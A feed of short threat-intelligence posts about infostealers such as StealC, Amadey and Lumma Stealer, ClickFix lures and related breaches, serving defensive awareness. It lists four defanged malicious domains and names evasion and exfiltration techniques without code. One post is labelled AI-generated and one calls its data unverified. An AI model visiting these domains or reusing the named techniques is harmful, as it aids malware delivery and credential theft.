StealC and Amadey: Breaking down infostealers and the cybercrime services that deliver them

Infostealers remain among the most pervasive cybercrime threats, silently harvesting passwords, cookies, and session tokens that enable enterprise breaches. StealC is a malware-as-a-service infostealer written in C++ that collects credentials from browsers, cryptocurrency wallets, messaging applications, email clients, and gaming platforms while functioning as a secondary loader. Amadey operates as a modular backdoor loader active since 2018, delivering downstream payloads including StealC, Lumma Stealer, and ransomware through various backdoor commands. Both operate on commodity rental models where stolen credentials flow through underground markets to access brokers who resell enterprise access. On June 24, 2026, Microsoft's Digital Crimes Unit coordinated with Europol to disrupt over 200 malicious command-and-control domains supporting these operations, using AI-assisted analysis tools including Microsoft Copilot for binary analysis and configuration extraction.

Pulse ID: 6a3bde31cd05f010063a2224
Pulse Link: https://otx.alienvault.com/pulse/6a3bde31cd05f010063a2224
Pulse Author: AlienVault
Created: 2026-06-24 13:40:01

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Amadey #BackDoor #Browser #Cookies #CyberCrime #CyberSecurity #Email #InfoSec #InfoStealer #LummaStealer #Malware #MalwareAsAService #Microsoft #OTX #OpenThreatExchange #Password #Passwords #RAT #RansomWare #Stealc #Word #bot #cryptocurrency #AlienVault

🚨 New #ClickFix IOC domains observed:

• bigblower[.]click
• ganiballektor[.]cfd
• lenders[.]digital
• pusanik[.]shop

Related research points to exposed / publicly accessible ClickFix infrastructure and operational dashboards tied to ongoing malware delivery and social engineering activity.

Read more: https://potato.id/en/posts/weak-secops-exposed-clickfix-dashboard/

#ThreatIntel #IOC #CyberSecurity #Infosec #DFIR #SOC #ThreatHunting #OSINT #Malware #Phishing #ClickFix #LummaStealer #DarkGate #CredentialTheft #BlueTeam #CTI #DetectionEngineering #IncidentResponse

Microsoft Utility MSHTA Fuels Malware Surge via Lumma Stealer Campaigns

Malware campaigns are on the rise, fueled by the Microsoft Utility MSHTA, which is being exploited to spread info stealers like Lumma Stealer and Amatera. This sneaky tactic is just the latest example of how cybercriminals are abusing a long-standing Windows feature to wreak havoc.

https://osintsights.com/microsoft-utility-mshta-fuels-malware-surge-via-lumma-stealer-campaigns?utm_source=mastodon&utm_medium=social

#LummaStealer #Mshta #MalwareLoader #InfoStealer #Amatera

REMUS Infostealer has emerged as a major threat, shifting its focus from credentials to authenticated browser sessions. This sophisticated Malware-as-a-Service bypasses MFA entirely by stealing your active login tokens *after* you've passed authentication. It's a fundamental shift in cybercrime strategy that demands a new approach to security.

https://www.tpp.blog/24wzjyk

#cybersecurity #remusinfostealer #lummastealer

🤖 This post was AI-generated.

Vercel Breach Exposes Additional Customer Accounts

A recent Vercel breach exposed additional customer accounts after a malicious chain of events began with a compromised employee account at Context.ai, which was likely triggered by a simple online search for Roblox scripts. The breach highlights the risks of malware distribution and token theft, with threat intel pointing to a sophisticated…

https://osintsights.com/vercel-breach-exposes-additional-customer-accounts?utm_source=mastodon&utm_medium=social

#VercelBreach #EmergingThreats #SupplyChain #MalwareOperations #LummaStealer

Dal Roblox script al breach di Vercel: come un infostealer ha quasi compromesso la supply chain di Next.js

https://insicurezzadigitale.com/dal-roblox-script-al-breach-di-vercel-come-un-infostealer-ha-quasi-compromesso-la-supply-chain-di-next-js/

Nowy wariant metody ClickFix – cyberprzestępcy rezygnują z Win+R na rzecz Win+X i Terminala Windows

Badacze bezpieczeństwa z Microsoft Defender ostrzegają przed nowym wariantem kampanii malware, w której cyberprzestępcy za pomocą phishingu nakłaniają użytkowników do instalacji złośliwego oprogramowania typu infostealer (Lumma Stealer). Atak opiera się na technice ClickFix, polegającej na przekonaniu użytkownika do uruchomienia złośliwych poleceń PowerShell.TLDR: Schemat ataku jest dosyć prosty. Korzystając z socjotechniki...

#Aktualności #Clickfix #LummaStealer #Microsoft #Windows #WindowsDefender

https://sekurak.pl/nowy-wariant-metody-clickfix-cyberprzestepcy-rezygnuja-z-winr-na-rzecz-winx-i-terminala-windows/

CTM360 identifies an active campaign leveraging Google Groups and Google-hosted redirect chains to deliver Lumma Stealer (Windows) and a trojanized Chromium fork branded “Ninja Browser” (Linux).
Technical highlights:
• 950MB padded executable (null-byte inflation)
• AutoIt loader reconstruction
• Memory-resident payload execution
• Multipart/form-data POST exfiltration
• Malicious extension “NinjaBrowserMonetisation”
• XOR + Base56-like JS obfuscation
• Scheduled task persistence
• Russian search engine default modification

This campaign reinforces a critical shift: SaaS platforms are now delivery infrastructure.
Defensive priorities:
– IoC blocking at firewall + EDR
– Redirect chain inspection
– Extension audit controls
– Endpoint scheduled task monitoring

How are you adjusting detection engineering for SaaS-based malware distribution?
Engage below.

Source: https://www.ctm360.com/reports/ninja-browser-lumma-infostealer

Follow @technadu for ongoing threat intelligence coverage.

#ThreatIntel #MalwareResearch #DetectionEngineering #SOCOperations #EDR #CloudSecurity #SaaSAbuse #LummaStealer #LinuxThreats #CTM360 #IncidentResponse